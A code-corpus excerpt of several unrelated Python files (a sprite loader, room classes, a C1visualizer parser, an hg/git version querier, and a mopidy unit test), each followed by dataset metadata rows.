        get_screen().set_sprite(sprite_id, data)
        return sprite_id


sprites_manager = SpritesManager()


class SpriteSheet:
    """A 2-bytes-per-pixel image file from which 32x32 sprites are extracted."""

    def __init__(self, filename=''):
        self.width = 0
        self.height = 0
        self.data = None      # raw pixel bytes (header stripped)
        self.sprites = {}     # Rect -> (sprite_id, BitMatrix mask) cache
        self.rect = None      # bounding Rect of the whole sheet
        if filename:
            self.load(filename)

    def clean(self):
        """Release the raw pixel buffer; already-extracted sprites stay valid."""
        self.data = None
        gc.collect()

    def load(self, filename):
        """Read the sheet: 4-byte little-endian width/height header + pixels.

        Returns True on success, False when the file cannot be read.
        """
        try:
            gc.collect()
            print("Loading " + filename)
            # gc.mem_free() exists on MicroPython only — TODO confirm target.
            print("Free Mem: " + str(gc.mem_free()))
            with open(filename, 'rb') as f:
                header = f.read(4)
                self.width = (int(header[1]) << 8) | int(header[0])
                self.height = (int(header[3]) << 8) | int(header[2])
                self.data = f.read()
            self.rect = Rect(0, 0, self.width, self.height)
            return True
        except OSError:
            return False

    def get_sprite_data(self, rect):
        """Extract the 32x32 sprite at `rect`; return (sprite_id, mask).

        Results are cached per rect.  Returns (-1, None) when rect is not a
        valid 32x32 region inside the sheet.
        """
        if rect in self.sprites:
            return self.sprites.get(rect)
        if (rect.valid() and self.rect.contains(rect)
                and rect.width() == 32 and rect.height() == 32):
            data = bytearray(32 * 32 * 2)
            src = (rect.tl.y * self.width + rect.tl.x) * 2
            dst = 0
            mask = BitMatrix(32, 32)
            mask.setall(True)
            for i in range(32):
                data[dst:(dst + 64)] = self.data[src:(src + 64)]
                for j in range(32):
                    # Pixel value 0x0020 marks transparency: clear it in the mask.
                    if data[dst + j * 2] == 0x20 and data[dst + j * 2 + 1] == 0:
                        mask.set(j, i, False)
                dst += 64
                src += self.width * 2
            sprite_data = sprites_manager.allocate(bytes(data)), mask
            self.sprites[rect] = sprite_data
        else:
            sprite_data = -1, None
        return sprite_data


sprite_sheets = {}


def get_sprite_sheet(filename):
    """Return a cached SpriteSheet for `filename`, loading it on first use."""
    if filename in sprite_sheets:
        return sprite_sheets.get(filename)
    s = SpriteSheet(filename)
    sprite_sheets[filename] = s
    return s


# EXPORT
class Sprite(object):
    """One 32x32 frame: a hardware sprite id, a collision mask, and timing."""

    def __init__(self, sprite_id, mask, duration=0.0, flags=0):
        self.sprite_id = sprite_id
        self.mask = mask
        self.duration = duration
        self.flags = flags

    def draw(self, position):
        get_screen().draw_sprite(position.x, position.y, self.sprite_id, self.flags)

    @staticmethod
    def get_rect():
        """All sprites are fixed 32x32."""
        return Rect(0, 0, 32, 32)

    @staticmethod
    def deserialize(filename, obj):
        """Build a Sprite from a JSON frame dict ('Rect', 'Duration', optional 'Flags')."""
        r = [int(a) for a in obj['Rect'].strip().split(',')]
        dur = obj['Duration']
        flags = obj['Flags'] if 'Flags' in obj else 0
        rect = Rect(r[0], r[1], r[2], r[3])
        sheet = get_sprite_sheet(filename)
        sprite_id, mask = sheet.get_sprite_data(rect)
        return Sprite(sprite_id, mask, dur, flags)


# EXPORT
class AnimationSequence(object):
    """An ordered list of Sprites played back at a base velocity."""

    def __init__(self, name, base_vel=1.0):
        self.name = name
        self.base_vel = base_vel
        self.sprites = []

    def add_sprite(self, sprite):
        self.sprites.append(sprite)

    def deserialize(self, filename, seq):
        """Replace current frames with those in the JSON 'Frames' list."""
        self.sprites = []
        for frame in seq['Frames']:
            self.add_sprite(Sprite.deserialize(filename, frame))

    def __getitem__(self, index):
        return self.sprites[index]

    def __len__(self):
        return len(self.sprites)


# EXPORT
class StaticSprite:
    """A single, non-animated sprite (possibly empty)."""

    def __init__(self, sprite=None):
        self.sprite = sprite

    def get_current_sprite(self):
        return self.sprite

    def get_rect(self):
        if self.sprite:
            return self.sprite.get_rect()
        return Rect(0, 0, 32, 32)

    def draw(self, pos):
        if self.sprite:
            self.sprite.draw(pos)


# EXPORT
class AnimatedSprite(object):
    """A sprite with named animation sequences advanced by time and velocity."""

    def __init__(self):
        self.sheet = None
        self.sequences = {}        # name -> AnimationSequence
        self.flags = {}
        self.active_sequence = None
        self.cur_sprite = 0        # index into the active sequence
        self.dt = 0.0              # time accumulated toward the next frame
        self.anim_dir = ''         # 'X'/'Y' axis driving the animation speed

    def add_flag(self, name, value):
        if name == 'AnimDir':
            self.anim_dir = value
        self.flags[name] = value

    def get_longest_sequence(self):
        mx = 0
        res = None
        for name in self.sequences:
            seq = self.sequences.get(name)
            if len(seq) > mx:
                mx = len(seq)
                res = seq
        return res

    def get_sequence_by_name(self, name):
        return self.sequences.get(name)

    def get_sequence_by_index(self, index):
        # NOTE(review): dict order is insertion order on Python 3.7+; on
        # MicroPython this may not be stable — confirm if index order matters.
        for name in self.sequences.keys():
            if index == 0:
                return self.sequences.get(name)
            index -= 1
        return None

    def get_active_sequence_name(self):
        if not self.active_sequence:
            return ''
        return self.active_sequence.name

    def set_active_sequence(self, name):
        """Switch sequences, restarting playback; no-op for same/unknown name."""
        if name != self.get_active_sequence_name() and name in self.sequences:
            self.active_sequence = self.sequences.get(name)
            self.dt = 0.0
            self.cur_sprite = 0

    def add_sequence(self, seq):
        self.sequences[seq.name] = seq
        if not self.active_sequence:
            self.active_sequence = seq

    def calculate_axial_velocity(self, velocity):
        """Speed along the configured animation axis ('X', 'Y', or magnitude)."""
        if self.anim_dir == 'X':
            return abs(velocity.x)
        if self.anim_dir == 'Y':
            return abs(velocity.y)
        return velocity.length()

    def advance(self, dt, velocity):
        """Advance playback by `dt`, scaled by velocity relative to base_vel."""
        axial_velocity = self.calculate_axial_velocity(velocity)
        if self.active_sequence and len(self.active_sequence) > 0:
            mult = 1.0
            if self.active_sequence.base_vel > 0 and axial_velocity > 0.001:
                mult = axial_velocity / self.active_sequence.base_vel
            self.dt = self.dt + dt * mult
            if self.cur_sprite >= len(self.active_sequence):
                self.cur_sprite = 0
            spr = self.active_sequence[self.cur_sprite]
            # Guard against duration == 0.0, which previously looped forever.
            # NOTE: `spr.duration` is read from the frame current when advance
            # was entered, matching the original behavior.
            while spr.duration > 0 and self.dt >= spr.duration:
                self.dt = self.dt - spr.duration
                self.cur_sprite += 1
                if self.cur_sprite >= len(self.active_sequence):
                    self.cur_sprite = 0
        return True

    def get_current_sprite(self):
        if self.active_sequence:
            return self.active_sequence[self.cur_sprite]
        return None

    def get_current_height(self):
        spr = self.get_current_sprite()
        if spr:
            # Sprite has no height() method; the original `spr.height()`
            # raised AttributeError.  Use the sprite's rect instead.
            return spr.get_rect().height()
        return 0

    def draw(self, position):
        spr = self.get_current_sprite()
        if spr:
            spr.draw(position)

    def get_rect(self):
        spr = self.get_current_sprite()
        if spr:
            return spr.get_rect()
        return Rect(0, 0, 1, 1)

    def deserialize(self, obj, overrides=None):
        """Populate from a JSON dict; `overrides` may replace 'BaseVelocity'.

        `overrides` now defaults to empty: module-level loaders call
        deserialize(obj) with one argument, which previously raised TypeError.
        """
        overrides = overrides or {}
        filename = obj['Image']
        flags = obj['Flags']
        for key in flags:
            self.add_flag(key, flags[key])
        for seq in obj['Sequences']:
            base_vel = seq['BaseVelocity']
            if 'BaseVelocity' in overrides:
                base_vel = overrides.get('BaseVelocity')
            s = AnimationSequence(seq['Name'], base_vel)
            s.deserialize(filename, seq)
            self.add_sequence(s)
        # Drop raw sheet pixel buffers now that all sprites are uploaded.
        for name in sprite_sheets:
            sprite_sheets.get(name).clean()

    def load(self, filename, overrides=None):
        # was: overrides={} (mutable default) and an unclosed file handle
        with open(filename, "r") as f:
            return self.deserialize(json.load(f), overrides)


# EXPORT
def load_json_file(filename):
    """Load an AnimatedSprite from a JSON file."""
    with open(filename, "r") as f:
        obj = json.load(f)
    a = AnimatedSprite()
    a.deserialize(obj)
    return a


# EXPORT
def load_json_str(s):
    """Load an AnimatedSprite from a JSON string."""
    obj = json.loads(s)
    a = AnimatedSprite()
    a.deserialize(obj)
    return a


# EXPORT
def load_file(filename):
    return load_json_file(filename)


# EXPORT
def load_str(s):
    return load_json_str(s)


if __name__ == '__main__':
    print(os.getcwd())
27.719243
100
0.561739
1,102
8,787
4.315789
0.137931
0.052986
0.05677
0.027754
0.178091
0.105341
0.08831
0.082422
0.059294
0.059294
0
0.017315
0.329578
8,787
316
101
27.806962
0.790019
0.018095
0
0.228571
0
0
0.01474
0
0
0
0.000464
0
0
1
0.167347
false
0
0.02449
0.032653
0.363265
0.012245
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
1
0
bdcdd065ac669fb99de9c3ef2f470429acaafd67
1,562
py
Python
models/room.py
kwahalf/data-structures
19ebcbee6108e9b843bace4e7264e5e9e5c5c6fd
[ "MIT" ]
1
2018-12-28T23:56:08.000Z
2018-12-28T23:56:08.000Z
models/room.py
kwahalf/data-structures
19ebcbee6108e9b843bace4e7264e5e9e5c5c6fd
[ "MIT" ]
null
null
null
models/room.py
kwahalf/data-structures
19ebcbee6108e9b843bace4e7264e5e9e5c5c6fd
[ "MIT" ]
null
null
null
from abc import ABCMeta, abstractmethod


class Room(object):
    """A room with a name, a bounded capacity, and a list of occupants."""

    # NOTE: Python-2 style metaclass declaration; has no effect on Python 3.
    __metaclass__ = ABCMeta

    room_count = 0  # class-wide counter used to issue unique room ids

    def __init__(self, name=None, max_capacity=None):
        self.room_id = Room.room_count
        # was: self.room_count += 1, which only created an instance attribute
        # and left the class counter at 0, so every room got room_id 0.
        Room.room_count += 1
        self.name = name
        self.max_capacity = max_capacity
        self.occupants = []

    def add_occupant(self, occupant):
        """Add `occupant`; return False (was NameError `false`) when full."""
        if self.is_full():
            return False
        self.occupants.append(occupant)
        return True

    def remove_occupant(self, occupant):
        """Remove `occupant` if present; return whether a removal happened."""
        if self.is_an_occupant(occupant):
            self.occupants.remove(occupant)
            return True
        return False

    def is_an_occupant(self, occupant):
        return occupant in self.occupants

    def is_full(self):
        return len(self.occupants) >= self.max_capacity

    def __repr__(self):
        # `purpose` is set by the concrete subclasses below.
        return '%s(name=%s, purpose=%s, max_capacity=%s)' % (
            self.__class__.__name__,
            self.name,
            self.purpose,
            self.max_capacity
        )

    def __str__(self):
        # was: `return Self.name` (NameError)
        return self.name


class OfficeSpace(Room):
    """An office room holding up to 6 occupants by default."""

    def __init__(self, name=None, max_capacity=6):
        Room.__init__(self, name=name, max_capacity=max_capacity)
        self.purpose = "OFFICE"


class LivingSpace(Room):
    """A living-space room holding up to 4 occupants by default."""

    def __init__(self, name=None, max_capacity=4):
        Room.__init__(self, name=name, max_capacity=max_capacity)
        self.purpose = "LIVINGSPACE"
27.892857
65
0.599232
179
1,562
4.871508
0.240223
0.151376
0.068807
0.051606
0.318807
0.288991
0.224771
0.12156
0.12156
0.12156
0
0.003663
0.300896
1,562
56
66
27.892857
0.794872
0.03073
0
0.146341
0
0
0.038025
0
0
0
0
0
0
1
0.219512
false
0
0.02439
0.097561
0.560976
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
1
0
0
0
0
1
0
0
2
bdcde9db518399671885520f0ddbde248285fab9
3,972
py
Python
tools/checker/file_format/c1visualizer/parser.py
lifansama/xposed_art_n
ec3fbe417d74d4664cec053d91dd4e3881176374
[ "MIT" ]
234
2017-07-18T05:30:27.000Z
2022-01-07T02:21:31.000Z
tools/checker/file_format/c1visualizer/parser.py
lifansama/xposed_art_n
ec3fbe417d74d4664cec053d91dd4e3881176374
[ "MIT" ]
21
2017-07-18T04:56:09.000Z
2018-08-10T17:32:16.000Z
tools/checker/file_format/c1visualizer/parser.py
lifansama/xposed_art_n
ec3fbe417d74d4664cec053d91dd4e3881176374
[ "MIT" ]
56
2017-07-18T10:37:10.000Z
2022-01-07T02:19:22.000Z
# Copyright (C) 2014 The Android Open Source Project
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#      http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.

from common.logger import Logger
from file_format.common import SplitStream
from file_format.c1visualizer.struct import C1visualizerFile, C1visualizerPass

import re


class C1ParserState:
    """Mutable parser state threaded through each call of __parseC1Line."""

    OutsideBlock, InsideCompilationBlock, StartingCfgBlock, InsideCfgBlock = range(4)

    def __init__(self):
        self.currentState = C1ParserState.OutsideBlock
        self.lastMethodName = None


def __parseC1Line(line, lineNo, state, fileName):
    """ This function is invoked on each line of the output file and returns
        a triplet which instructs the parser how the line should be handled. If the
        line is to be included in the current group, it is returned in the first
        value. If the line starts a new output group, the name of the group is
        returned in the second value. The third value is only here to make the
        function prototype compatible with `SplitStream` and is always set to
        `None` here.
    """
    if state.currentState == C1ParserState.StartingCfgBlock:
        # Previous line started a new 'cfg' block which means that this one must
        # contain the name of the pass (this is enforced by C1visualizer).
        # Regexes are raw strings now; '\s' in a plain string is an invalid
        # escape and warns on modern Python.
        if re.match(r'name\s+"[^"]+"', line):
            # Extract the pass name, prepend it with the name of the method and
            # return as the beginning of a new group.
            state.currentState = C1ParserState.InsideCfgBlock
            return (None, state.lastMethodName + " " + line.split("\"")[1], None)
        else:
            Logger.fail("Expected output group name", fileName, lineNo)
    elif state.currentState == C1ParserState.InsideCfgBlock:
        if line == "end_cfg":
            state.currentState = C1ParserState.OutsideBlock
            return (None, None, None)
        else:
            return (line, None, None)
    elif state.currentState == C1ParserState.InsideCompilationBlock:
        # Search for the method's name. Format: method "<name>"
        if re.match(r'method\s+"[^"]*"', line):
            methodName = line.split("\"")[1].strip()
            if not methodName:
                Logger.fail("Empty method name in output", fileName, lineNo)
            state.lastMethodName = methodName
        elif line == "end_compilation":
            state.currentState = C1ParserState.OutsideBlock
        return (None, None, None)
    else:
        assert state.currentState == C1ParserState.OutsideBlock
        if line == "begin_cfg":
            # The line starts a new group but we'll wait until the next line from
            # which we can extract the name of the pass.
            if state.lastMethodName is None:
                Logger.fail("Expected method header", fileName, lineNo)
            state.currentState = C1ParserState.StartingCfgBlock
            return (None, None, None)
        elif line == "begin_compilation":
            state.currentState = C1ParserState.InsideCompilationBlock
            return (None, None, None)
        else:
            Logger.fail("C1visualizer line not inside a group", fileName, lineNo)


def ParseC1visualizerStream(fileName, stream):
    """Parse a C1visualizer output stream into a C1visualizerFile of passes."""
    c1File = C1visualizerFile(fileName)
    state = C1ParserState()
    fnProcessLine = lambda line, lineNo: __parseC1Line(line, lineNo, state, fileName)
    fnLineOutsideChunk = lambda line, lineNo: \
        Logger.fail("C1visualizer line not inside a group", fileName, lineNo)
    for passName, passLines, startLineNo, testArch in \
            SplitStream(stream, fnProcessLine, fnLineOutsideChunk):
        # Line numbers are printed one-based.
        C1visualizerPass(c1File, passName, passLines, startLineNo + 1)
    return c1File
43.648352
83
0.716012
500
3,972
5.66
0.36
0.088339
0.095406
0.016961
0.139223
0.084099
0.084099
0.084099
0.084099
0.038869
0
0.01198
0.20141
3,972
90
84
44.133333
0.880202
0.357754
0
0.226415
0
0
0.0893
0
0
0
0
0
0.018868
1
0.056604
false
0.056604
0.075472
0
0.283019
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
1
0
0
0
0
0
1
bdcfa69692cd0e84e62228bc835f2c497955444e
10,882
py
Python
natcap/versioner/versioning.py
natcap/versioner
65e4c1cf38115dcfec260f0d186cedca192b0b2e
[ "BSD-3-Clause" ]
null
null
null
natcap/versioner/versioning.py
natcap/versioner
65e4c1cf38115dcfec260f0d186cedca192b0b2e
[ "BSD-3-Clause" ]
null
null
null
natcap/versioner/versioning.py
natcap/versioner
65e4c1cf38115dcfec260f0d186cedca192b0b2e
[ "BSD-3-Clause" ]
null
null
null
"""Query version information from Mercurial/Git working copies and hg archives."""
from __future__ import absolute_import

import logging
import os
import re
import subprocess

import six

LOGGER = logging.getLogger('natcap.versioner.versioning')
LOGGER.setLevel(logging.ERROR)


class VCSQuerier(object):
    """Abstract base for asking a VCS checkout about tags, branches and nodes."""

    name = 'VCS'                # human-readable VCS name, used in error messages
    is_archive = False          # True only for exported archives (see HgArchive)
    repo_data_location = ''     # marker file/dir that identifies the repo root

    def __init__(self, repo_path):
        repo_root = self._find_repo_root(repo_path)
        if not repo_root:
            raise ValueError('Not within a %s repository: %s' % (
                self.name, repo_path))
        self._repo_path = repo_root

    def _find_repo_root(self, dirpath):
        """Walk up the directory tree and locate the directory that contains
        the repo data."""
        abs_repo_path = os.path.abspath(dirpath)

        def _locate_data(path):
            # base case: we can't go up another directory and still haven't
            # found the repo data.
            if os.path.dirname(path) == path:
                return None
            if os.path.exists(os.path.join(path, self.repo_data_location)):
                return path
            return _locate_data(os.path.dirname(path))
        return _locate_data(abs_repo_path)

    def _run_command(self, cmd, cwd=None):
        """Run a subprocess.Popen command.  All output to stdout, stdin and
        stderr will be treated as stdout, captured, and returned.

        Commands are executed as shell commands.

        Parameters:
            cmd (string) - a python string to be executed in the shell.
            cwd=None (string or None) - the string path to the directory on
                disk to use as the CWD.  If None, the current CWD will be
                used.

        Returns:
            A python bytestring of the output of the given command."""
        p = subprocess.check_output(
            cmd, shell=True, stdin=subprocess.PIPE,
            stderr=subprocess.STDOUT, cwd=cwd)
        # output without leading/trailing newlines
        return p.strip().decode('utf-8')

    # The five properties below form the contract every backend implements.
    @property
    def tag_distance(self):
        raise NotImplementedError

    @property
    def build_id(self):
        raise NotImplementedError

    @property
    def latest_tag(self):
        raise NotImplementedError

    @property
    def branch(self):
        raise NotImplementedError

    @property
    def node(self):
        raise NotImplementedError

    @property
    def release_version(self):
        """This function gets the release version.

        Returns either the latest tag (if we're on a release tag) or None,
        if we're on a dev changeset."""
        if self.tag_distance == 0:
            return self.latest_tag
        return None

    @property
    def version(self):
        """This function gets the module's version string.  This will be
        either the dev build ID (if we're on a dev build) or the current tag
        if we're on a known tag.  Either way, the return type is a string."""
        release_version = self.release_version
        if release_version is None:
            return self.build_dev_id(self.build_id)
        return release_version

    def build_dev_id(self, build_id=None):
        """This function builds the dev version string.  Returns a string."""
        if build_id is None:
            build_id = self.build_id
        return 'dev%s' % (build_id)

    def pep440(self, branch=True, method='post'):
        """Build a PEP 440-compliant version string.

        At a tag, the tag itself is returned.  Otherwise the string encodes
        tag, distance, node and (optionally) branch; 'pre' increments the tag
        first so the result sorts *before* the upcoming release.
        """
        assert method in ['pre', 'post'], ('Versioning method %s '
                                           'not valid') % method
        # If we're at a tag, return the tag only.
        if self.tag_distance == 0:
            return self.latest_tag

        template_string = "%(latesttag)s.%(method)s%(tagdist)s+n%(node)s"
        if branch is True:
            template_string += "-%(branch)s"

        latest_tag = self.latest_tag
        if method == 'pre':
            latest_tag = _increment_tag(latest_tag)

        data = {
            'tagdist': self.tag_distance,
            'latesttag': latest_tag,
            'node': self.node,
            'branch': self.branch,
            'method': method,
        }
        version_string = template_string % data
        return version_string


class HgArchive(VCSQuerier):
    """Backend for an exported hg archive (reads .hg_archival.txt, runs no hg)."""

    name = 'Mercurial Archive'
    shortnode_len = 12  # number of node-hash characters shown in build ids
    is_archive = True
    repo_data_location = '.hg_archival.txt'

    @property
    def build_id(self):
        attrs = _get_archive_attrs(self._repo_path)
        return '{latesttagdistance}:{latesttag} [{node}]'.format(
            latesttagdistance=attrs['latesttagdistance'],
            latesttag=attrs['latesttag'],
            node=attrs['node'][:self.shortnode_len],
        )

    @property
    def tag_distance(self):
        try:
            return _get_archive_attrs(self._repo_path)['latesttagdistance']
        except KeyError:
            # This happens when we are at a tag.
            return 0

    @property
    def latest_tag(self):
        attrs = _get_archive_attrs(self._repo_path)
        try:
            return six.text_type(attrs['latesttag'])
        except KeyError:
            # This happens when we are at a tag.
            return six.text_type(attrs['tag'])

    @property
    def branch(self):
        return _get_archive_attrs(self._repo_path)['branch']

    @property
    def node(self):
        return _get_archive_attrs(self._repo_path)['node'][:self.shortnode_len]


class HgRepo(VCSQuerier):
    """Backend for a live Mercurial working copy; shells out to `hg log`."""

    name = 'Mercurial'
    is_archive = False
    repo_data_location = '.hg'

    def _log_template(self, template_string):
        # --config ui.report_untrusted=False keeps hg warnings out of stdout.
        hg_call = 'hg log -r . --config ui.report_untrusted=False'
        cmd = (hg_call + ' --template="%s"') % template_string
        return self._run_command(cmd, cwd=self._repo_path)

    @property
    def build_id(self):
        """Call mercurial with a template argument to get the build ID.
        Returns a python bytestring."""
        return self._log_template('{latesttagdistance}:{latesttag} '
                                  '[{node|short}]')

    @property
    def tag_distance(self):
        """Call mercurial with a template argument to get the distance to the
        latest tag.  Returns an int."""
        return int(self._log_template('{latesttagdistance}'))

    @property
    def latest_tag(self):
        """Call mercurial with a template argument to get the latest tag.

        Returns a python bytestring."""
        return self._log_template('{latesttag}')

    @property
    def branch(self):
        """Get the current branch from hg."""
        return self._log_template('{branch}')

    @property
    def node(self):
        return self._log_template('{node|short}')


class GitRepo(VCSQuerier):
    """Backend for a git working copy; shells out to git and caches the result
    of `git describe` in private attributes between property reads."""

    name = 'Git'
    repo_data_location = '.git'

    def __init__(self, repo_path):
        VCSQuerier.__init__(self, repo_path)
        # Populated by _describe_current_rev on demand.
        self._tag_distance = None
        self._latest_tag = None
        self._commit_hash = None

    def _run_command(self, cmd):
        # Always run inside the repo root.
        return VCSQuerier._run_command(self, cmd, self._repo_path)

    @property
    def branch(self):
        branch_cmd = 'git branch'
        current_branches = self._run_command(branch_cmd)
        for line in current_branches.split('\n'):
            # `git branch` marks the current branch with '* '.
            if line.startswith('* '):
                return line.replace('* ', '').strip()
        raise IOError('Could not detect current branch')

    def _describe_current_rev(self):
        """Refresh _tag_distance, _latest_tag and _commit_hash from git."""
        self._tag_distance = None
        self._latest_tag = None
        self._commit_hash = None
        current_branch = self.branch
        try:
            data = self._run_command('git describe --tags')
        except subprocess.CalledProcessError:
            # when there are no tags
            self._latest_tag = 'null'
            num_commits_cmd = 'git rev-list %s --count' % current_branch
            self._tag_distance = self._run_command(num_commits_cmd)
            commit_hash_cmd = 'git log -1 --pretty="format:%h"'
            self._commit_hash = self._run_command(commit_hash_cmd)
        else:
            if '-' not in data:
                # then we're at a tag
                self._latest_tag = str(data)
                self._tag_distance = 0
                commit_hash_cmd = 'git log -1 --pretty="format:%h"'
                self._commit_hash = self._run_command(commit_hash_cmd)
            else:
                # we're not at a tag, so data has the format:
                # data = tagname-tagdistance-commit_hash
                # NOTE(review): a tag name that itself contains '-' would make
                # this split produce too many values — confirm tag conventions.
                tagname, tag_dist, _commit_hash = data.split('-')
                self._tag_distance = int(tag_dist)
                self._latest_tag = tagname
                self._commit_hash = self.node

    @property
    def build_id(self):
        self._describe_current_rev()
        return "%s:%s [%s]" % (self._tag_distance, self._latest_tag,
                               self._commit_hash)

    @property
    def tag_distance(self):
        self._describe_current_rev()
        return self._tag_distance

    @property
    def latest_tag(self):
        self._describe_current_rev()
        return self._latest_tag

    @property
    def node(self):
        return self._run_command('git rev-parse HEAD').strip()[:8]

    @property
    def is_archive(self):
        # Archives are a mercurial feature.
        return False


def _increment_tag(version_string):
    """Return `version_string` with its last dotted component incremented."""
    assert len(re.findall('([0-9].?)+', version_string)) >= 1, (
        'Version string must be a release')
    # Increment the last component of the version (e.g. 1.2.3 -> 1.2.4), so a
    # 'pre' version sorts before the next release.
    tag = [int(s) for s in version_string.split('.')]
    tag[-1] += 1
    return '.'.join([str(i) for i in tag])


def _get_archive_attrs(archive_path):
    """
    Read build attributes out of an hg archive's metadata file.

    If we're in an hg archive, there will be a file '.hg_archival.txt' in the
    repo root with keys such as
    "repo"|"node"|"branch"|"latesttag"|"latesttagdistance"|"changessincelatesttag".

    Parameters:
        archive_path (string): The path to the mercurial archive.  The
            .hg_archival.txt file must exist right inside this directory.

    Returns:
        A dict of the attributes within the .hg_archival file.

    Raises:
        IOError when the .hg_archival.txt file cannot be found.
    """
    archival_filepath = os.path.join(archive_path, '.hg_archival.txt')
    attributes = {}
    with open(archival_filepath) as archival_file:
        for line in archival_file:
            attr_name, value = line.strip().split(': ')
            # Try to cast the attribute to an int (since it might be a
            # revision number).  If it doesn't cast, leave it as a string.
            try:
                value = int(value)
            except ValueError:
                pass
            attributes[attr_name] = value
    return attributes
32.195266
86
0.609355
1,360
10,882
4.675735
0.188971
0.039786
0.020758
0.028306
0.301462
0.19437
0.142947
0.126435
0.089322
0.077685
0
0.002355
0.297647
10,882
337
87
32.290801
0.829648
0.231299
0
0.37156
0
0
0.09464
0.019593
0
0
0
0
0.009174
1
0.16055
false
0.004587
0.027523
0.027523
0.417431
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
1
0
bdd0adc5de287fb179800281e8709f5913da7913
878
py
Python
tests/utils/init_test.py
swinton/mopidy
c32c73f5112c29ef7ccccf36a508c571adb39759
[ "Apache-2.0" ]
null
null
null
tests/utils/init_test.py
swinton/mopidy
c32c73f5112c29ef7ccccf36a508c571adb39759
[ "Apache-2.0" ]
null
null
null
tests/utils/init_test.py
swinton/mopidy
c32c73f5112c29ef7ccccf36a508c571adb39759
[ "Apache-2.0" ]
null
null
null
from mopidy import utils

from tests import unittest


class GetClassTest(unittest.TestCase):

    """Tests for dynamic class loading via ``utils.get_class``."""

    def test_loading_module_that_does_not_exist(self):
        with self.assertRaises(ImportError):
            utils.get_class('foo.bar.Baz')

    def test_loading_class_that_does_not_exist(self):
        with self.assertRaises(ImportError):
            utils.get_class('unittest.FooBarBaz')

    def test_loading_incorrect_class_path(self):
        # No dots at all: not a valid "module.Class" path.
        with self.assertRaises(ImportError):
            utils.get_class('foobarbaz')

    def test_import_error_message_contains_complete_class_path(self):
        # The previous try/except form passed silently when no ImportError
        # was raised at all; assertRaises turns that into a test failure.
        with self.assertRaises(ImportError) as cm:
            utils.get_class('foo.bar.Baz')
        self.assertIn('foo.bar.Baz', str(cm.exception))

    def test_loading_existing_class(self):
        cls = utils.get_class('unittest.TestCase')
        self.assertEqual(cls.__name__, 'TestCase')
31.357143
69
0.6959
109
878
5.284404
0.385321
0.060764
0.112847
0.125
0.359375
0.359375
0.305556
0.305556
0.222222
0.222222
0
0
0.210706
878
27
70
32.518519
0.831169
0
0
0.25
0
0
0.096811
0
0
0
0
0
0.25
1
0.25
false
0
0.35
0
0.65
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
1
0
0
1
0
1
0
0
3
bdd18a04d17e95c0953ca2e0c3d8db5c195b7e67
1,054
py
Python
src/two_level_aspect_entity_embedding_generation/clusterd_knowledge_graph_statistics.py
mainuliitkgp/AR-BERT
d6d5e8542a3a1c76edac49cec9e99ebda6395725
[ "MIT" ]
4
2022-03-06T17:41:57.000Z
2022-03-22T08:42:58.000Z
src/two_level_aspect_entity_embedding_generation/clusterd_knowledge_graph_statistics.py
mainuliitkgp/AR-BERT
d6d5e8542a3a1c76edac49cec9e99ebda6395725
[ "MIT" ]
null
null
null
src/two_level_aspect_entity_embedding_generation/clusterd_knowledge_graph_statistics.py
mainuliitkgp/AR-BERT
d6d5e8542a3a1c76edac49cec9e99ebda6395725
[ "MIT" ]
1
2022-03-19T14:04:42.000Z
2022-03-19T14:04:42.000Z
from __future__ import print_function import numpy as np import random import json import sys import os import networkx as nx from networkx.readwrite import json_graph version_info = list(map(int, nx.__version__.split('.'))) major = version_info[0] minor = version_info[1] assert (major <= 1) and (minor <= 11), "networkx major version > 1.11" if __name__ == "__main__": graph_file = sys.argv[1] #out_file = sys.argv[2] G_data = json.load(open(graph_file)) #print(G_data) G = json_graph.node_link_graph(G_data) nodes = [n for n in G.nodes() if not G.node[n]["val"] and not G.node[n]["test"]] G = G.subgraph(nodes) count = 0 max_node_degree = 0 for count, node in enumerate(nodes): if G.degree(node) == 0: continue else : count += G.degree(node) if G.degree(node)>max_node_degree: max_node_degree = G.degree(node) avg_node_degree = count/len(nodes) print(len(nodes), avg_node_degree, max_node_degree) print(nx.is_connected(G))
28.486486
84
0.651803
164
1,054
3.926829
0.365854
0.093168
0.080745
0.02795
0.071429
0
0
0
0
0
0
0.01599
0.228653
1,054
36
85
29.277778
0.776138
0.033207
0
0
0
0
0.044248
0
0
0
0
0
0.033333
1
0
false
0
0.266667
0
0.266667
0.1
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
1
0
bdd1f5712640c660f6739b854770d7e695f1c4d4
8,167
py
Python
src/aioros/tcpros/topic.py
mgrrx/aioros
9bd750020d0d5fb466891346f61b6f083cbb8f05
[ "Apache-2.0" ]
8
2020-08-27T17:16:59.000Z
2022-02-02T13:39:41.000Z
src/aioros/tcpros/topic.py
mgrrx/aioros
9bd750020d0d5fb466891346f61b6f083cbb8f05
[ "Apache-2.0" ]
3
2022-02-09T19:18:12.000Z
2022-03-08T21:12:00.000Z
src/aioros/tcpros/topic.py
mgrrx/aioros
9bd750020d0d5fb466891346f61b6f083cbb8f05
[ "Apache-2.0" ]
null
null
null
